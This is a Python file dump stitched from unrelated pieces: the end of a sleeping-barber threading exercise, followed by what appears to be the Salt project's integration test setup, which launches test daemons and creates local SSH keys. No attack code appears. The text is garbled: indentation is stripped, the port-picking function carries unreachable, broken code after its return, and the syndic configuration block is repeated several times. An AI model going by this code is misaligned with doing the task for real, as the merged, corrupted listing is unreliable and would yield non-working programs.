def enterBarberShop(self, customer):
mutex.acquire()
# Barber is busy
print(f'-> {customer} entered the shop and is looking for a seat')
# There is no where to sit, so leave
if len(self.waitingCustomers) == numberOfSeats:
print(f'Waiting room is full, {customer} has left')
self.numberCustomersLeft += 1
mutex.release()
# There is a seat, so sit and wait for barber to finish
else:
print(f'{customer} sat down in the waiting room')
self.waitingCustomers.append(customer)
mutex.release()
barber.wakeUp()
# Initializes a Customer who has a counter to help with the creation of customers
class Customer:
def __init__(self, numCustomers):
self.numCustomer = numCustomers
# Takes in the number of customers and creates a list of them of size numCustomers
def makeCustomers(self):
customers = []
i = self.numCustomer
while i > 0:
customers.append(f'Customer #{i}')
i -= 1
return customers
# Initializing a Barber with a counter to keep track of the total number of customers served
# Functions to manage sleeping, waking up, and cutting hair
class Barber:
customersServed = 0
barberWorkingEvent = Event()
def sleep(self):
# Set barber as waiting
self.barberWorkingEvent.wait()
def wakeUp(self):
# Set barber as active
self.barberWorkingEvent.set()
def cutHair(self, customer):
# Set barber as busy
self.barberWorkingEvent.clear()
print(f'{customer} is having a haircut')
randomHairCuttingTime = random.randrange(haircutDurationMin, haircutDurationMax + 1)
time.sleep(randomHairCuttingTime)
print(f'{customer} is done')
self.customersServed += 1
if __name__ == '__main__':
# Initializing barber object
barber = Barber()
# Asking for user input to initialize the barber shop
numCustomers = input("How many people are getting a haircut today: ")
numCustomers = int(numCustomers)
customers = Customer(numCustomers)
customersList = customers.makeCustomers()
numberOfSeats = input("How many seats: ")
numberOfSeats = int(numberOfSeats)
customerIntervalMin = input("Minimum time interval for a customer shows up: ")
customerIntervalMin = int(customerIntervalMin)
customerIntervalMax = input("Maximum time interval for a customer to show up: ")
customerIntervalMax = int(customerIntervalMax)
haircutDurationMin = input("Minimum amount of time a haircut should take: ")
haircutDurationMin = int(haircutDurationMin)
haircutDurationMax = input("Maximum amount of time a haircut should take: ")
haircutDurationMax = int(haircutDurationMax)
barberShop = BarberShop(barber, numberOfSeats, customerIntervalMin, customerIntervalMax, haircutDurationMin,
haircutDurationMax)
barberShop.openShop()
# Loop that controls the flow of customers
while len(customersList) > 0:
customer = customersList.pop()
barberShop.enterBarberShop(customer)
customerInterval = random.randrange(customerIntervalMin, customerIntervalMax + 1)
time.sleep(customerInterval)
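# Once every customer has entered, this loop ends and the main thread finishes; the barber thread
# keeps serving whoever is still in the waiting room and closes the shop (printing the day's totals)
# when both the waiting list and the customer list are empty.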
|
__init__.py
|
# -*- coding: utf-8 -*-
"""
Set up the Salt integration test suite
"""
# Import Python libs
from __future__ import absolute_import, print_function
import atexit
import copy
import errno
import logging
import multiprocessing
import os
import pprint
import re
import shutil
import signal
import socket
import stat
import subprocess
import sys
import tempfile
import threading
import time
from datetime import datetime, timedelta
# Import Salt libs
import salt
import salt.config
import salt.log.setup as salt_log_setup
import salt.master
import salt.minion
import salt.output
import salt.runner
import salt.utils.color
import salt.utils.files
import salt.utils.msgpack
import salt.utils.path
import salt.utils.platform
import salt.utils.process
import salt.utils.stringutils
import salt.utils.yaml
import salt.version
from salt.exceptions import SaltClientError
# Import 3rd-party libs
from salt.ext import six
from salt.utils.immutabletypes import freeze
from salt.utils.verify import verify_env
from tests.support.case import ShellTestCase
from tests.support.cli_scripts import ScriptPathMixin
from tests.support.helpers import RedirectStdStreams, requires_sshd_server
from tests.support.mixins import (
AdaptedConfigurationTestCaseMixin,
CheckShellBinaryNameAndVersionMixin,
SaltClientTestCaseMixin,
SaltMinionEventAssertsMixin,
SaltReturnAssertsMixin,
ShellCaseCommonTestsMixin,
)
from tests.support.parser import PNUM, SaltTestcaseParser, print_header
from tests.support.paths import * # pylint: disable=wildcard-import
from tests.support.processes import * # pylint: disable=wildcard-import
# Import salt tests support libs
from tests.support.processes import SaltMaster, SaltMinion, SaltSyndic
from tests.support.runtests import RUNTIME_VARS
from tests.support.unit import TestCase
try:
import pwd
except ImportError:
pass
try:
import salt.ext.six.moves.socketserver as socketserver # pylint: disable=no-name-in-module
except ImportError:
import socketserver
log = logging.getLogger(__name__)
_RUNTESTS_PORTS = {}
def get_unused_localhost_port():
"""
Return a random unused port on localhost
"""
usock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
usock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
usock.bind(("127.0.0.1", 0))
port = usock.getsockname()[1]
if port in (54505, 54506, 64505, 64506, 64507, 64508, 64510, 64511, 64520, 64521):
# These ports are hardcoded in the test configuration
port = get_unused_localhost_port()
usock.close()
return port
DARWIN = True if sys.platform.startswith("darwin") else False
BSD = True if "bsd" in sys.platform else False
AIX = True if sys.platform.startswith("aix") else False
if (AIX or DARWIN) and port in _RUNTESTS_PORTS:
port = get_unused_localhost_port()
usock.close()
return port
_RUNTESTS_PORTS[port] = usock
if DARWIN or BSD or AIX:
usock.close()
return port
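# The bound sockets stored in _RUNTESTS_PORTS keep each chosen port reserved so the same port is not
# handed out twice during a test run; close_open_sockets below releases them at interpreter exit via
# the atexit hook. On Darwin, BSD and AIX the socket is closed right away instead, as handled above.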
def close_open_sockets(sockets_dict):
for port in list(sockets_dict):
sock = sockets_dict.pop(port)
sock.close()
atexit.register(close_open_sockets, _RUNTESTS_PORTS)
SALT_LOG_PORT = get_unused_localhost_port()
class ThreadingMixIn(socketserver.ThreadingMixIn):
daemon_threads = False
class ThreadedSocketServer(ThreadingMixIn, socketserver.TCPServer, object):
allow_reuse_address = True
def server_activate(self):
self.shutting_down = threading.Event()
super(ThreadedSocketServer, self).server_activate()
def server_close(self):
if hasattr(self, "shutting_down"):
self.shutting_down.set()
super(ThreadedSocketServer, self).server_close()
class SocketServerRequestHandler(socketserver.StreamRequestHandler):
def handle(self):
unpacker = salt.utils.msgpack.Unpacker(encoding="utf-8")
while not self.server.shutting_down.is_set():
try:
wire_bytes = self.request.recv(1024)
if not wire_bytes:
break
unpacker.feed(wire_bytes)
for record_dict in unpacker:
record = logging.makeLogRecord(record_dict)
logger = logging.getLogger(record.name)
logger.handle(record)
del record_dict
except (EOFError, KeyboardInterrupt, SystemExit):
break
except socket.error as exc:
try:
if exc.errno == errno.WSAECONNRESET:
# Connection reset on windows
break
except AttributeError:
# We're not on windows
pass
log.exception(exc)
except Exception as exc: # pylint: disable=broad-except
log.exception(exc)
class TestDaemonStartFailed(Exception):
"""
Simple exception to signal that a test daemon failed to start
"""
class TestDaemon(object):
"""
Set up the master and minion daemons, and run related cases
"""
MINIONS_CONNECT_TIMEOUT = MINIONS_SYNC_TIMEOUT = 600
def __init__(self, parser):
self.parser = parser
self.colors = salt.utils.color.get_colors(
self.parser.options.no_colors is False
)
if salt.utils.platform.is_windows():
# There's no shell color support on windows...
for key in self.colors:
self.colors[key] = ""
def __enter__(self):
"""
Start a master and minion
"""
# Setup the multiprocessing logging queue listener
salt_log_setup.setup_multiprocessing_logging_listener(self.master_opts)
# Set up PATH to mockbin
self._enter_mockbin()
self.minion_targets = set(["minion", "sub_minion"])
if self.parser.options.transport == "zeromq":
self.start_zeromq_daemons()
elif self.parser.options.transport == "tcp":
self.start_tcp_daemons()
self.pre_setup_minions()
self.setup_minions()
if getattr(self.parser.options, "ssh", False):
self.prep_ssh()
self.wait_for_minions(time.time(), self.MINIONS_CONNECT_TIMEOUT)
if self.parser.options.sysinfo:
try:
print_header(
"~~~~~~~ Versions Report ",
inline=True,
width=getattr(self.parser.options, "output_columns", PNUM),
)
except TypeError:
print_header("~~~~~~~ Versions Report ", inline=True)
print("\n".join(salt.version.versions_report()))
try:
print_header(
"~~~~~~~ Minion Grains Information ",
inline=True,
width=getattr(self.parser.options, "output_columns", PNUM),
)
except TypeError:
print_header("~~~~~~~ Minion Grains Information ", inline=True)
grains = self.client.cmd("minion", "grains.items")
minion_opts = self.minion_opts.copy()
minion_opts["color"] = self.parser.options.no_colors is False
salt.output.display_output(grains, "grains", minion_opts)
try:
print_header(
"=",
sep="=",
inline=True,
width=getattr(self.parser.options, "output_columns", PNUM),
)
except TypeError:
print_header("", sep="=", inline=True)
try:
return self
finally:
self.post_setup_minions()
def start_zeromq_daemons(self):
"""
Fire up the daemons used for zeromq tests
"""
self.log_server = ThreadedSocketServer(
("localhost", SALT_LOG_PORT), SocketServerRequestHandler
)
self.log_server_process = threading.Thread(target=self.log_server.serve_forever)
self.log_server_process.start()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting salt-master ... {ENDC}".format(**self.colors)
)
sys.stdout.flush()
self.master_process = start_daemon(
daemon_name="salt-master",
daemon_id=self.master_opts["id"],
daemon_log_prefix="salt-master/{}".format(self.master_opts["id"]),
daemon_cli_script_name="master",
daemon_config=self.master_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltMaster,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
start_timeout=120,
)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting salt-master ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting salt-master ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting salt-minion ... {ENDC}".format(**self.colors)
)
sys.stdout.flush()
self.minion_process = start_daemon(
daemon_name="salt-minion",
daemon_id=self.master_opts["id"],
daemon_log_prefix="salt-minion/{}".format(self.minion_opts["id"]),
daemon_cli_script_name="minion",
daemon_config=self.minion_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltMinion,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
start_timeout=120,
)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting salt-minion ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting salt-minion ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting sub salt-minion ... {ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
self.sub_minion_process = start_daemon(
daemon_name="sub salt-minion",
daemon_id=self.master_opts["id"],
daemon_log_prefix="sub-salt-minion/{}".format(
self.sub_minion_opts["id"]
),
daemon_cli_script_name="minion",
daemon_config=self.sub_minion_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR,
daemon_class=SaltMinion,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
start_timeout=120,
)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting sub salt-minion ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting sub salt-minion ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting syndic salt-master ... {ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
self.prep_syndic()
self.smaster_process = start_daemon(
daemon_name="salt-smaster",
daemon_id=self.syndic_master_opts["id"],
daemon_log_prefix="salt-smaster/{}".format(
self.syndic_master_opts["id"]
),
daemon_cli_script_name="master",
daemon_config=self.syndic_master_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR,
daemon_class=SaltMaster,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR,
start_timeout=120,
)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting syndic salt-master ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting syndic salt-master ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting salt-syndic ... {ENDC}".format(**self.colors)
)
sys.stdout.flush()
self.syndic_process = start_daemon(
daemon_name="salt-syndic",
daemon_id=self.syndic_opts["id"],
daemon_log_prefix="salt-syndic/{}".format(self.syndic_opts["id"]),
daemon_cli_script_name="syndic",
daemon_config=self.syndic_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR,
daemon_class=SaltSyndic,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
start_timeout=120,
)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting salt-syndic ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting salt-syndic ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
if self.parser.options.proxy:
self.minion_targets.add(self.proxy_opts["id"])
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting salt-proxy ... {ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
self.proxy_process = start_daemon(
daemon_name="salt-proxy",
daemon_id=self.proxy_opts["id"],
daemon_log_prefix="salt-proxy/{}".format(self.proxy_opts["id"]),
daemon_cli_script_name="proxy",
daemon_config=self.proxy_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltProxy,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=120,
)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting salt-proxy ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting salt-proxy ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
start_tcp_daemons = start_zeromq_daemons
def prep_syndic(self):
"""
Create a roster file for salt's syndic
"""
roster_path = os.path.join(FILES, "conf/_ssh/roster")
shutil.copy(roster_path, RUNTIME_VARS.TMP_CONF_DIR)
shutil.copy(roster_path, RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR)
def prep_ssh(self):
"""
Generate keys and start an ssh daemon on an alternate port
"""
sys.stdout.write(
" * {LIGHT_GREEN}Starting {0} ... {ENDC}".format(
"SSH server", **self.colors
)
)
keygen = salt.utils.path.which("ssh-keygen")
sshd = salt.utils.path.which("sshd")
if not (keygen and sshd):
print(
"WARNING: Could not initialize SSH subsystem. Tests for salt-ssh may break!"
)
return
if not os.path.exists(RUNTIME_VARS.TMP_CONF_DIR):
os.makedirs(RUNTIME_VARS.TMP_CONF_DIR)
# Generate client key
pub_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "key_test.pub")
priv_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "key_test")
if os.path.exists(pub_key_test_file):
os.remove(pub_key_test_file)
if os.path.exists(priv_key_test_file):
os.remove(priv_key_test_file)
keygen_process = subprocess.Popen(
[
keygen,
"-t",
"ecdsa",
"-b",
"521",
"-C",
'"$(whoami)@$(hostname)-$(date -I)"',
"-f",
"key_test",
"-P",
"",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=RUNTIME_VARS.TMP_CONF_DIR,
)
_, keygen_err = keygen_process.communicate()
if keygen_err:
print(
"ssh-keygen had errors: {0}".format(
salt.utils.stringutils.to_str(keygen_err)
)
)
sshd_config_path = os.path.join(FILES, "conf/_ssh/sshd_config")
shutil.copy(sshd_config_path, RUNTIME_VARS.TMP_CONF_DIR)
auth_key_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "key_test.pub")
# Generate server key
server_key_dir = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "server")
if not os.path.exists(server_key_dir):
os.makedirs(server_key_dir)
server_dsa_priv_key_file = os.path.join(server_key_dir, "ssh_host_dsa_key")
server_dsa_pub_key_file = os.path.join(server_key_dir, "ssh_host_dsa_key.pub")
server_ecdsa_priv_key_file = os.path.join(server_key_dir, "ssh_host_ecdsa_key")
server_ecdsa_pub_key_file = os.path.join(
server_key_dir, "ssh_host_ecdsa_key.pub"
)
server_ed25519_priv_key_file = os.path.join(
server_key_dir, "ssh_host_ed25519_key"
)
server_ed25519_pub_key_file = os.path.join(
server_key_dir, "ssh_host.ed25519_key.pub"
)
for server_key_file in (
server_dsa_priv_key_file,
server_dsa_pub_key_file,
server_ecdsa_priv_key_file,
server_ecdsa_pub_key_file,
server_ed25519_priv_key_file,
server_ed25519_pub_key_file,
):
if os.path.exists(server_key_file):
os.remove(server_key_file)
keygen_process_dsa = subprocess.Popen(
[
keygen,
"-t",
"dsa",
"-b",
"1024",
"-C",
'"$(whoami)@$(hostname)-$(date -I)"',
"-f",
"ssh_host_dsa_key",
"-P",
"",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir,
)
_, keygen_dsa_err = keygen_process_dsa.communicate()
if keygen_dsa_err:
print(
"ssh-keygen had errors: {0}".format(
salt.utils.stringutils.to_str(keygen_dsa_err)
)
)
keygen_process_ecdsa = subprocess.Popen(
[
keygen,
"-t",
"ecdsa",
"-b",
"521",
"-C",
'"$(whoami)@$(hostname)-$(date -I)"',
"-f",
"ssh_host_ecdsa_key",
"-P",
"",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir,
)
_, keygen_escda_err = keygen_process_ecdsa.communicate()
if keygen_escda_err:
print(
"ssh-keygen had errors: {0}".format(
salt.utils.stringutils.to_str(keygen_escda_err)
)
)
keygen_process_ed25519 = subprocess.Popen(
[
keygen,
"-t",
"ed25519",
"-b",
"521",
"-C",
'"$(whoami)@$(hostname)-$(date -I)"',
"-f",
"ssh_host_ed25519_key",
"-P",
"",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir,
)
_, keygen_ed25519_err = keygen_process_ed25519.communicate()
if keygen_ed25519_err:
print(
"ssh-keygen had errors: {0}".format(
salt.utils.stringutils.to_str(keygen_ed25519_err)
)
)
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "sshd_config"), "a"
) as ssh_config:
ssh_config.write("AuthorizedKeysFile {0}\n".format(auth_key_file))
if not keygen_dsa_err:
ssh_config.write("HostKey {0}\n".format(server_dsa_priv_key_file))
if not keygen_escda_err:
ssh_config.write("HostKey {0}\n".format(server_ecdsa_priv_key_file))
if not keygen_ed25519_err:
ssh_config.write("HostKey {0}\n".format(server_ed25519_priv_key_file))
self.sshd_pidfile = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "sshd.pid")
self.sshd_process = subprocess.Popen(
[sshd, "-f", "sshd_config", "-o", "PidFile={0}".format(self.sshd_pidfile)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=RUNTIME_VARS.TMP_CONF_DIR,
)
_, sshd_err = self.sshd_process.communicate()
if sshd_err:
print(
"sshd had errors on startup: {0}".format(
salt.utils.stringutils.to_str(sshd_err)
)
)
else:
os.environ["SSH_DAEMON_RUNNING"] = "True"
self.prep_syndic()
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "roster"), "a"
) as roster:
roster.write(" user: {0}\n".format(RUNTIME_VARS.RUNNING_TESTS_USER))
roster.write(
" priv: {0}/{1}".format(RUNTIME_VARS.TMP_CONF_DIR, "key_test")
)
sys.stdout.write(" {LIGHT_GREEN}STARTED!\n{ENDC}".format(**self.colors))
@classmethod
def config(cls, role):
"""
Return a configuration for a master/minion/syndic.
Currently these roles are:
* master
* minion
* syndic
* syndic_master
* sub_minion
* proxy
"""
return RUNTIME_VARS.RUNTIME_CONFIGS[role]
@classmethod
def config_location(cls):
return RUNTIME_VARS.TMP_CONF_DIR
@property
def client(self):
"""
Return a local client which will be used for example to ping and sync
the test minions.
This client is defined as a class attribute because its creation needs
to be deferred to a later stage. If it were created on `__enter__`, as it
previously was, it would not receive the master events.
"""
if "runtime_client" not in RUNTIME_VARS.RUNTIME_CONFIGS:
RUNTIME_VARS.RUNTIME_CONFIGS[
"runtime_client"
] = salt.client.get_local_client(mopts=self.master_opts)
return RUNTIME_VARS.RUNTIME_CONFIGS["runtime_client"]
@classmethod
def transplant_configs(cls, transport="zeromq"):
if os.path.isdir(RUNTIME_VARS.TMP):
shutil.rmtree(RUNTIME_VARS.TMP)
os.makedirs(RUNTIME_VARS.TMP)
os.makedirs(RUNTIME_VARS.TMP_ROOT_DIR)
os.makedirs(RUNTIME_VARS.TMP_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR)
print(
" * Transplanting configuration files to '{0}'".format(
RUNTIME_VARS.TMP_CONF_DIR
)
)
tests_known_hosts_file = os.path.join(
RUNTIME_VARS.TMP_CONF_DIR, "salt_ssh_known_hosts"
)
with salt.utils.files.fopen(tests_known_hosts_file, "w") as known_hosts:
known_hosts.write("")
# This master connects to syndic_master via a syndic
master_opts = salt.config._read_conf_file(
os.path.join(RUNTIME_VARS.CONF_DIR, "master")
)
master_opts["known_hosts_file"] = tests_known_hosts_file
master_opts["cachedir"] = "cache"
master_opts["user"] = RUNTIME_VARS.RUNNING_TESTS_USER
master_opts["root_dir"] = os.path.join(TMP_ROOT_DIR)
master_opts["pki_dir"] = "pki"
master_opts["syndic_master"] = "localhost"
pytest_stop_sending_events_file = os.path.join(
TMP_ROOT_DIR, "pytest_stop_sending_events_file_master"
)
with salt.utils.files.fopen(pytest_stop_sending_events_file, "w") as wfh:
wfh.write("")
master_opts["pytest_stop_sending_events_file"] = pytest_stop_sending_events_file
file_tree = {
"root_dir": os.path.join(FILES, "pillar", "base", "file_tree"),
"follow_dir_links": False,
"keep_newline": True,
}
master_opts["ext_pillar"].append({"file_tree": file_tree})
# Config settings to test `event_return`
if "returner_dirs" not in master_opts:
master_opts["returner_dirs"] = []
master_opts["returner_dirs"].append(
os.path.join(RUNTIME_VARS.FILES, "returners")
)
master_opts["event_return"] = "runtests_noop"
# Under Windows we can't seem to properly create a virtualenv off of another
# virtualenv; we can on Linux, but we will still point to the virtualenv binary
# outside the virtualenv running the test suite, if that's the case.
try:
real_prefix = sys.real_prefix
# The above attribute exists, this is a virtualenv
if salt.utils.platform.is_windows():
virtualenv_binary = os.path.join(
real_prefix, "Scripts", "virtualenv.exe"
)
else:
# We need to remove the virtualenv from PATH or we'll get the virtualenv binary
# from within the virtualenv, we don't want that
path = os.environ.get("PATH")
if path is not None:
path_items = path.split(os.pathsep)
for item in path_items[:]:
if item.startswith(sys.base_prefix):
path_items.remove(item)
os.environ["PATH"] = os.pathsep.join(path_items)
virtualenv_binary = salt.utils.path.which("virtualenv")
if path is not None:
# Restore previous environ PATH
os.environ["PATH"] = path
if not virtualenv_binary.startswith(real_prefix):
virtualenv_binary = None
if virtualenv_binary and not os.path.exists(virtualenv_binary):
# It doesn't exist?!
virtualenv_binary = None
except AttributeError:
# We're not running inside a virtualenv
virtualenv_binary = None
# This minion connects to master
minion_opts = salt.config._read_conf_file(
os.path.join(RUNTIME_VARS.CONF_DIR, "minion")
)
minion_opts["cachedir"] = "cache"
minion_opts["user"] = RUNTIME_VARS.RUNNING_TESTS_USER
minion_opts["root_dir"] = os.path.join(TMP_ROOT_DIR)
minion_opts["pki_dir"] = "pki"
minion_opts["hosts.file"] = os.path.join(TMP_ROOT_DIR, "hosts")
minion_opts["aliases.file"] = os.path.join(TMP_ROOT_DIR, "aliases")
if virtualenv_binary:
minion_opts["venv_bin"] = virtualenv_binary
# This sub_minion also connects to master
sub_minion_opts = salt.config._read_conf_file(
os.path.join(RUNTIME_VARS.CONF_DIR, "sub_minion")
)
sub_minion_opts["cachedir"] = "cache"
sub_minion_opts["user"] = RUNTIME_VARS.RUNNING_TESTS_USER
sub_minion_opts["root_dir"] = os.path.join(TMP, "rootdir-sub-minion")
sub_minion_opts["pki_dir"] = "pki"
sub_minion_opts["hosts.file"] = os.path.join(TMP_ROOT_DIR, "hosts")
sub_minion_opts["aliases.file"] = os.path.join(TMP_ROOT_DIR, "aliases")
if virtualenv_binary:
sub_minion_opts["venv_bin"] = virtualenv_binary
# This is the master of masters
syndic_master_opts = salt.config._read_conf_file(
os.path.join(RUNTIME_VARS.CONF_DIR, "syndic_master")
)
syndic_master_opts["cachedir"] = "cache"
syndic_master_opts["user"] = RUNTIME_VARS.RUNNING_TESTS_USER
syndic_master_opts["root_dir"] = os.path.join(TMP, "rootdir-syndic-master")
syndic_master_opts["pki_dir"] = "pki"
pytest_stop_sending_events_file = os.path.join(
TMP_ROOT_DIR, "pytest_stop_sending_events_file_syndic_master"
)
with salt.utils.files.fopen(pytest_stop_sending_events_file, "w") as wfh:
wfh.write("")
syndic_master_opts[
"pytest_stop_sending_events_file"
] = pytest_stop_sending_events_file
# This is the syndic for master
# Let's start with a copy of the syndic master configuration
syndic_opts = copy.deepcopy(syndic_master_opts)
# Let's update with the syndic configuration
syndic_opts.update(
salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, "syndic"))
)
syndic_opts["cachedir"] = "cache"
syndic_opts["root_dir"] = os.path.join(TMP_ROOT_DIR)
# This is the syndic for master
# Let's start with a copy of the syndic master configuration
syndic_opts = copy.deepcopy(syndic_master_opts)
# Let's update with the syndic configuration
syndic_opts.update(
salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, "syndic"))
)
syndic_opts["cachedir"] = os.path.join(TMP, "rootdir", "cache")
syndic_opts["config_dir"] = RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR
# This proxy connects to master
proxy_opts = salt.config._read_conf_file(os.path.join(CONF_DIR, "proxy"))
proxy_opts["cachedir"] = "cache"
# proxy_opts['user'] = running_tests_user
proxy_opts["root_dir"] = os.path.join(TMP, "rootdir-proxy")
proxy_opts["pki_dir"] = "pki"
proxy_opts["hosts.file"] = os.path.join(TMP, "rootdir-proxy", "hosts")
proxy_opts["aliases.file"] = os.path.join(TMP, "rootdir-proxy", "aliases")
if transport == "tcp":
master_opts["transport"] = "tcp"
minion_opts["transport"] = "tcp"
sub_minion_opts["transport"] = "tcp"
syndic_master_opts["transport"] = "tcp"
proxy_opts["transport"] = "tcp"
# This is the syndic for master
# Let's start with a copy of the syndic master configuration
syndic_opts = copy.deepcopy(master_opts)
# Let's update with the syndic configuration
syndic_opts.update(
salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, "syndic"))
)
syndic_opts["cachedir"] = os.path.join(TMP, "rootdir", "cache")
syndic_opts["config_dir"] = RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR
# Set up config options that require internal data
master_opts["pillar_roots"] = syndic_master_opts["pillar_roots"] = {
"base": [
RUNTIME_VARS.TMP_PILLAR_TREE,
os.path.join(FILES, "pillar", "base"),
]
}
minion_opts["pillar_roots"] = {
"base": [
RUNTIME_VARS.TMP_PILLAR_TREE,
os.path.join(FILES, "pillar", "base"),
]
}
master_opts["file_roots"] = syndic_master_opts["file_roots"] = {
"base": [
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
RUNTIME_VARS.TMP_STATE_TREE,
os.path.join(FILES, "file", "base"),
],
# Alternate root to test __env__ choices
"prod": [
os.path.join(FILES, "file", "prod"),
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
],
}
minion_opts["file_roots"] = {
"base": [
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
RUNTIME_VARS.TMP_STATE_TREE,
os.path.join(FILES, "file", "base"),
],
# Alternate root to test __env__ choices
"prod": [
os.path.join(FILES, "file", "prod"),
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
],
}
master_opts.setdefault("reactor", []).append(
{"salt/minion/*/start": [os.path.join(FILES, "reactor-sync-minion.sls")]}
)
for opts_dict in (master_opts, syndic_master_opts):
if "ext_pillar" not in opts_dict:
